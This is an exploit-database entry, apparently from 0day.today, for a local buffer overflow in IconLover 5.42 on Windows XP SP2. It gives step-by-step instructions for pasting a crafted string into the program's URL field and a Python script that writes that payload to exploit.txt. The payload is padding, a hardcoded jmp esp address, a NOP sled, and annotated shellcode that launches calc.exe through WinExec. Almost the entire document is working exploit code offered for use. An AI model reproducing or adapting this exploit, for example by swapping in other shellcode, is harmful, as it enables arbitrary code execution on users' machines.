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IconLover 5.42 - Local Buffer Overflow Exploit
# Exploit Title: IconLover v5.42 Buffer Overflow Exploit # Date: 29/09/2015 # Exploit Author: cor3sm4sh3r # Contact: https://in.linkedin.com/in/cor3sm4sh3r # Twitter: https://twitter.com/cor3sm4sh3r # Category: Local # Tested : win XP professional sp2 ''' Affected Product(s): ==================== AHA-Soft Product: IconLover - Software (Windows) 5.42 and 5.45 Manual steps to exploit... 1. Copy the content of exploit.txt to your clipboard 2. Run the IconLover.exe software 3. Click the File -> New Icon Lybrary option 4. Click the Lybrary and push the Download button 5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide 6. Successful exploitation will open an instance of calc.exe! ''' #!/usr/bin/env python #badchars = "\x00\x0a\x0d" junk = "\x41" * 1039 eip = "\xed\x1e\x94\x7c" #jmp esp 7c941eed ntdll.dll ( XP sp2 ) nopsled ="\x90"*20 shellcode = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register shellcode += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe" shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" | shellcode += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX shellcode += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack shellcode += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX shellcode += "\xFF\xD3" #=> CALL EBX shellcode += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register shellcode += "\x50" #=> PUSH EAX | Push EAX shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process shellcode += "\xFF\xD3" #=> CALL EBX packet = junk + eip + nopsled + shellcode + nopsled file=open('exploit.txt','w') file.write(packet) file.close() # 0day.today [2025-01-07] #